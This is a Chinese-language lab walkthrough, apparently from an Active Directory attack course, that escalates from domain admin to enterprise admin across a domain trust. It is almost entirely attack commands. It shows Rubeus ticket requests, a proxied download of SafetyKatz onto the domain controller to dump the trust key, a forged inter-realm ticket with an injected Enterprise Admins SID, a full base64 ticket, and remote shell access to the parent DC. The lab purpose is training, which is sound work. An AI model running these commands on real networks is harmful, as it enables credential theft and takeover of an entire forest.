任务
• 使用 DA 访问 dollarcorp.moneycorp.local,使用域信任密钥将权限升级到企业管理员或 DA 到父域 moneycorp.local。
使用DA权限启动一个进程
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /pttecho F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exewinrs -r:dcorp-dc cmdnetsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.32C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::trust /patch" "exit"
S-1-5-21-719815819-3726368948-3917688648
d734ad37a107de6af946c74d8b19d9c4
回到本机
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args silver /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /ldap /user:Administrator /nowrap
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgs /service:http/mcorp-dc.MONEYCORP.LOCAL /dc:mcorp-dc.MONEYCORP.LOCAL /ptt /ticket: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 -r:mcorp-dc.moneycorp.local cmd© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
